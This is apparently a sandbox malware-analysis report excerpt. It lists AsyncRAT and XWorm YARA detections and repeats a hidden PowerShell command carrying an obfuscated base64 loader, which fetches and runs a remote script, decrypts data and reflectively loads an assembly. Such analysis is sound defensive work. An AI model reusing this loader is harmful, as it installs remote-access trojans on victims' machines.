                Source: 0000000B.00000002.1945403188.000001D7CE2B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0000000B.00000002.1945403188.000001D7CE2E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000005.00000002.2325412269.000001D3133AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0000000B.00000002.1969459274.000001D7E4BB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 0000000B.00000002.1969459274.000001D7E4BB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000012.00000002.2074612069.000001E1AA261000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000017.00000002.2248750195.000002CC070F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0000000B.00000002.1945403188.000001D7CCDB3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0000001C.00000002.2323673539.0000020601DE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000017.00000002.2248750195.000002CC07141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 7456, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 7900, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 3152, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 7312, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 2720, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Uses shutdown.exe to shutdown or reboot the system
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\shutdown.exe shutdown.exe -L
                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Wscript starts Powershell (via cmd or directly)
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\bYKR19crJ6p8904.bat" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRB